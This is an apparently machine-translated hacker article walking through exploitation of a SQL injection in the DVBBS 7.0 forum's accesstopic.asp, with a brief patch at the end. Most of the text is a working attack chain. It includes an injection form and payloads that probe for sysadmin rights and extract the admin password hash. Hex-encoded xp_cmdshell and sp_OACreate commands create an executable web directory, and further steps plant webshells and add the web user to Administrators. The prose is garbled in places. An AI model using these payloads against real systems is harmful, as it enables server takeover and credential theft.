DVBBS7.0---behind a smile

Dynamic Network Forum 7.0 since the release has further expanded its reputation in the field of ASP forum and praise, whether in the art, performance, security and efficiency than the previous version of a great progress. The only thing I feel when I read the code is--beauty. But the world Stadium Ah, the code to write more rigorous is also a time of negligence. In order to find out its loopholes, I was like a haystack in the vast code in search, suddenly looking back at the lights in the dim place. Please follow me to see it. The first discovery Newland code   open accesstopic.asp file, turn to 第200-212 line, content is: ... Sub freetopic () ... For I=1 to Request.Form ("Announceid"). Countid=replace (Request.Form ("Announceid") (i), "'", "") ' Delete if Request (" ActionType ") =2 thenset rs=dvbbs.execute (" Select Rootid from "&Dvbbs.NowUsebbs& where Parentid=0 and Announceid = "&id" If not (rs.eof and Rs.bof) thendvbbs.execute ("Delete from dv_topic where topicid=" &rs (0)) Dvbbs.execute (" Delete from ' & Dvbbs.nowusebbs & where rootid= ' &rs (0)) foundid=rs (0) elsedvbbs.execute ("Delete from" & dvbbs.nowusebbs& "where announceid=" &id) foundid=0end If ... It is clear that the value of Request.Form ("Announceid") is filtered only in single quotes, but luckily it is not used as a string in the SQL statement, otherwise it is not played. To break through this single quotation mark is very simple, as long as we need to use the string in SQL Encoder to convert it can be used directly. The basic principle is that the varbinary type of data is automatically converted to varchar type data in MSSQL, however, this is generally not distinguishable in ASP. In the next operation involves the part of the string for ease of understanding, I guaranteeLeft the original text. In the actual operation, please use SQL encoder for conversion, unless the special circumstances do not explain. The second article moving the Network Forum's shoe This file in the Dynamic Network forum is the various to be audited the post the operation, discovers the flaw process for deletes to be audited The post (Request ("ActionType") =2). But this function only can be used when opening the post audit function of a certain page, and only the owner can use it, its flag variable is the 4th number of dv_board.boardsetting column in the data. Because this feature is turned off by default and is not used by most forums, it is rated as a low risk vulnerability. In the use of the time we can imagine that Access database function is low, as if it is a moron, there is no value, so I only discuss the use of MSSQL database. You might think, in that case, you can not use the error to get the administrator's password de MD5 ciphertext, this can be wrong. The execution of each SQL statement in the forum is done through Dvbbs.execute this process, the related code can be found in the inc\dv_clsmain.asp, in this process filtered dv_admin keyword, At first I wanted to construct the statement in a special way, but it all failed, but don't forget to tell me if you have any way of succeeding. Since the Announceid is made with Request.Form, it is necessary to construct a local submission form, which reads: Code  <form action= "http://target server address and relative path/ Accesstopic.asp?action=freetopic "Method=post name=batch><input type=hidden value=" modified to open the Audit feature layout boardid value "Name =boardid><input name= "ActionType" value= "2" Type=hidden><textarea name= "Announceid" cols= "M" rows= "20" Id= "Announceid" ></textarea><input name=submit value= "Execute" type=submit></form> as long as the above conditions are met, Set the values in the form so that you can look down. The third one is to let us know our power. Before you get an absolute path, you have to determine the permissions of the current database user, and here you have aQuestion, the information returned is the same regardless of whether the statement we submitted is valid or not, as long as no errors are generated. You may have thought of it, that is, to set the value of Announceid to an already existing post to be audited, after the successful submission, if the post has been deleted to show that our condition is correct, otherwise it is wrong. Here for convenience, assume that each execution uses an existing boardid=1 post. Because only sysadmin has value in all of the permissions in the database, it's just a matter of judging him. Open the form we just constructed, and log on to another page with the moderator's account, the following is done under this condition and therefore no longer mentioned. So fill in the textarea with: 1 and 1= (select Is_srvrolemember (' sysadmin ')), and the results are known based on the criteria mentioned above. You can also use this method to determine whether there is a xp_cmdshell storage extension, with a commit statement of 1 and 1= (select COUNT (*) from master.dbo.sysobjects where xtype= ' X ' and name= ' XP _cmdshell ') If you do not have this permission, you can only use the error to look at the password of the front desk administrator, the statement to be submitted is: 1 and 1= (select top 1 userpassword from Dv_user where usergroupid=1) If you want to get your privileges in the forums to be elevated, break the MD5 cipher--it's said to be very difficult. However, in the case of sysadmin permissions, it is equivalent to the absolute control of the server-executing with system privileges in the operating system. And then look down at how I use that privilege. Fourth chapter looking for the Roman road in the No. 2004.3 issue of the Stinky beggar mentioned the use of Xp_regread storage extensions to read the registry to obtain the Web absolute path, but after my test that this method can only get the Web server installation when the default path, If the administrator is smart enough to be sure to modify this value, it will lead to upload ASP Trojan failure. I think you may have experienced this situation. Now think about it, since you can not get this path, then on the server with our path to build a virtual directory problem is not solved? This can be done by submitting the following statement to my test: 1;exec (' Master.dbo.xp_cmdshell ' cscript C:\Inetpub\AdminScripts\mkwebdir.vbs-c localhost-w"1"-V "Win", "c:\winnt\" "Exec" (' Master.dbo.xp_cmdshell ' cscript c:\inetpub\adminscripts/adsutil.vbs set w3svc/1/ Root/win/accessexecute true ') This creates a virtual directory named win under the default server with an absolute path of c:\winnt\ and the ability to execute dynamic scripts. The use of Mkwebdir.vbs and adsutil.vbs can be referenced by Microsoft MSDN It's more than I understand. Now you can determine whether to create success by accessing http://www.sitename.com/win/: Return 403 error description creation success, return 500 error description creation failed. You may find a problem, after using SQL Encoder encoding to commit the statement did not succeed once, is there any error in the statement? However, if you test in the Query Analyzer, he will successfully execute, the problem is in the data type conversion problem. The EXEC function in MSSQL does not perform the data type conversion we require, and therefore requires an additional operation. The correct submission code is: code  1;declare @a nvarchar (255); Select @a= 0x6d00610073007400650072002e00640062006f002e00780070005f0063006d0064007300680065006c006c002000270063007300630072006900700 07400200063003a005c0069006e00650074007000750062005c00610064006d0069006e0073006300720069007000740073005c006d006b0077006500 62006400690072002e0076006200730020002d00630020006c006f00630061006c0068006f007300740020002d007700200022003100220020002d007 60020002200770069006e0022002c00220063003a005c00770069006e006e0074005c0022002700;exec (@a); Select @a= 0x6d00610073007400650072002e00640062006f002e00780070005f0063006d0064007300680065006c006c00200027006300730063007200690070007400200063003a00 5c0069006e00650074007000750062005c00610064006d0069006e0073006300720069007000740073002f006100640073007500740069006c002e007 6006200730020007300650074002000770033007300760063002f0031002f0072006f006f0074002f00770069006e002f006100630063006500730073 006500780065006300750074006500200074007200750065002700;exec (@a), first declare a variable of type nvarchar (255), and then let the assignment operator do the conversion of the data type. It is also important to note that the single quotation marks within the string inside the MSSQL are enclosed in two single quotes, but we must adhere to a single quotation mark when we encode using SQL Encoder, and execute the policy of the assignment operator for data types that cannot be converted by the expression. This method is basically used in the following code, so be sure to remember it in order to use it flexibly. Perhaps you will encounter the server is not xp_cmdshell situation, and this time has not got the web absolute path, the establishment of the Webshell is simply impossible to talk about. Do not be discouraged in this situation, we have another way to do this operation. Submit the following statement: Code  1;declare @o int;exec sp_oacreate ' Wscript.Shell ', @o out;exec sp_OAMethod @o, ' run ', NULL, ' cscript C:\Inetpub\AdminScripts\mkwebdir.vbs-c localhost-w "1"-V "Win", "c:\winnt\" '; exec sp_oacreate ' Wscript.Shell ' , @o out;exec sp_OAMethod @o, ' run ', NULL, ' cscript c:\inetpub\adminscripts/adsutil.vbs set W3svc/1/root/win/accessexecute True; The problem with data type conversion can be solved using the method just mentioned. In general, administrators will rarely notice the two storage extensions of sp_OACreate and sp_OAMethod, and you can use them with ease. Now the continent leading to Rome is in front of us, so let us run! What, you say drive faster? The fifth article put the sports car on the road after you know the Web absolute path, you can write to Webshell, as far as I know there are five ways to achieve: 1. N.E.V.E.R through the use of data backup methods, although there is a large number of garbage data generation, but the requirements of the authority is very low, specific reference to his related articles; 2. Czy's method of using sp_makewebtask storage to extend the export of data in a table has little additional data and avoids the use of xp_cmdshell storage extensions, which I have given detailed code in Sp_makewebtask.txt; 3. Using xp_cmdshell to execute batch processing, this method is more practical, there is no more than the data write problem, in the Xp_cmdshell.txt file you can find detailed content. Can be used to connect only the server 80 ports--if there are 3389, do you want me to say it? 4. Using the sp_OACreate and sp_OAMethod storage extensions to perform batch processing, the conditions used are the same as those of xp_cmdshell, since this method is no longer given code with almost expatiating in 3; 5. Use the sp_OACreate and sp_OAMethod two storage extensions to invoke the Scripting.FileSystemObject object for file creation and write operations, using the same conditions as above. There is detailed code in the Sp_oacreate&sp_oamethod.txt file. The Webshell code given in the above method is modified from the ocean top cmd.asp, after simplifying only 13 lines of key parts, detailed content see Cmd.txt. How did you drive the car on the road to see the actual situation, horse Grandpa told us to specific circumstances specific analysis of it! Sixth, fasten your seatbelt. The system permissions in the database become the guests permissions after the establishment of the Webshell, this is not a waste of it! In order to inherit the glorious tradition of thrift, you can execute the following SQL statement to minimize the waste: exec (' Master.dbo.xp_cmdshell ' net localgroup Administrators IUSR_ ' +host_name () + '/add ') of course, through the sp_OACreate and sp_OAMethod these two storage extensions can also be implemented, the key is flexible use, timely, local conditions. You asked me what I should do next? I faint, you still buy more than two black defense look at it, it will teach you how to do. Concluding remarks In fact, the patch is very simple, as long as the code in the Id=replace (Request.Form ("Announceid") (i), "'", "" "The sentence to the following statement on the id= Request.Form (" Announceid ") (i) if IsNumeric (ID) thenid=clng (ID) elseid=0end If do not underestimate the role of the IsNumeric function, fix the loophole can rely on it all. It's hard to build a building, but it's easy to tear it down. If you want to make your own design of the building more solid, it is more complete design, even if the details of the part can not be spared, lest due to negligence caused by the nest. It's not just the collapse of the software itself, it's the potential for devastating disaster and even the entire server and server